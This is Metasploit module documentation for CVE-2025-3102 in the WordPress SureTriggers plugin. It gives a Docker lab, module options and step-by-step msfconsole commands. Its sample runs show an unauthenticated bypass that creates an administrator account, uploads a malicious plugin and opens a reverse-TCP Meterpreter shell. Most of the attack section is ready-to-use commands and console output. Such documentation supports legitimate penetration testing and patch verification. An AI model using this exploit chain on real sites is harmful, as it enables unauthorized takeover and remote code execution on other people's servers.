## Vulnerable Application

This Metasploit module exploits an administrative user creation vulnerability in the
WordPress SureTriggers plugin, versions <= 1.0.78 (CVE-2025-3102).
The plugin exposes an unauthenticated REST endpoint (`automation/action`) that allows
bypassing permission checks to create a new administrator account.

To replicate a vulnerable environment for testing:

1. Install WordPress using the provided Docker Compose configuration.
2. Download and install the SureTriggers plugin v1.0.78:
   [https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip](https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip)
3. Verify that the plugin is activated and accessible on the local network.
4. No further configuration is required; vulnerability is present immediately upon activation.

## Docker Compose Configuration

```yaml
services:

  wordpress:
    image: wordpress:6.3.2
    restart: always
    ports:
      - 5555:80
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: chocapikk
      WORDPRESS_DB_PASSWORD: dummy_password
      WORDPRESS_DB_NAME: exploit_market
    volumes:
      - wordpress:/var/www/html
      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini

  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_DATABASE: exploit_market
      MYSQL_USER: chocapikk
      MYSQL_PASSWORD: dummy_password
      MYSQL_ROOT_PASSWORD: dummy_password
    volumes:
      - db:/var/lib/mysql

volumes:
  wordpress:
  db:
```

Create a `custom.ini` file with:

```ini
upload_max_filesize = 64M
post_max_size = 64M
```

## Verification Steps

1. Start the environment:

```bash
docker-compose up -d
```

2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555)
3. Confirm that SureTriggers v1.0.78 is active under **Plugins**
4. Launch `msfconsole`
5. Load the module:

```bash
use exploit/multi/http/wp_suretriggers_auth_bypass
```

6. Set `RHOSTS` to the target IP
7. Optionally set `ST_AUTH` if you have an existing key
8. Configure `WP_USER`, `WP_PASS`, `WP_EMAIL`
9. Execute the exploit with `run`

## Options

* **RHOSTS**: Target IP address or hostname where WordPress is running.
* **TARGETURI**: Base path to the WordPress installation (default is `/`).
* **WP_USER**, **WP_PASS**, **WP_EMAIL**: Credentials for the new administrator account that the exploit will create.
  By default these are randomly generated but you can set them to values of your choice, for example:

```bash
set WP_USER eviladmin
set WP_PASS Str0ngP@ss!
set WP_EMAIL eviladmin@example.com
```

* **ST_AUTH**: *(Optional)* If you have the plugin’s secret key (used in the `st_authorization` header),
  you can provide it here to authenticate the REST request.
  If left empty the module will send an empty header value, which still works on versions <= 1.0.78.

## Scenarios

### Successful Exploitation Against SureTriggers v1.0.78

**Setup:**

* Local WordPress instance with SureTriggers v1.0.78
* Metasploit Framework

**Steps:**

1. Start `msfconsole`

2. Load the module:
```bash
use exploit/multi/http/wp_suretriggers_auth_bypass
```
3. Configure:
```bash
set RHOSTS 127.0.0.1
set TARGETURI /
set WP_USER eviladmin
set WP_PASS Str0ngP@ss!
run
```

**Expected Results**:

With `php/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.3.2
[+] Detected suretriggers plugin version: 1.0.78
[+] The target appears to be vulnerable.
[*] Attempting to create administrator user via auth bypass...
[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_p2ash/ajax_efdsa.php...
[*] Sending stage (40004 bytes) to 172.27.0.2
[+] Deleted ajax_efdsa.php
[+] Deleted wp_p2ash.php
[+] Deleted ../wp_p2ash
[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.27.0.2:33924) at 2025-05-07 17:22:49 +0200

meterpreter > sysinfo
Computer    : a6e792b1c252
OS          : Linux a6e792b1c252 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
Meterpreter : php/linux
```

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```plaintext
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   PHP In-Memory
    1   Unix In-Memory
    2   Windows In-Memory


msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
target => 1
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
[*] Started reverse TCP handler on 192.168.1.36:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected WordPress version: 6.3.2
[+] Detected suretriggers plugin version: 1.0.78
[+] The target appears to be vulnerable.
[*] Attempting to create administrator user via auth bypass...
[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
[*] Uploading malicious plugin for code execution...
[*] Executing payload at /wp-content/plugins/wp_ppqii/ajax_cqc8l.php...
[*] Sending stage (3045380 bytes) to 172.27.0.2
[+] Deleted ajax_cqc8l.php
[+] Deleted wp_ppqii.php
[+] Deleted ../wp_ppqii
[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.2:54238) at 2025-05-07 17:24:10 +0200

meterpreter > sysinfo
Computer     : 172.27.0.2
OS           : Debian 11.8 (Linux 6.14.2-2-cachyos)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```
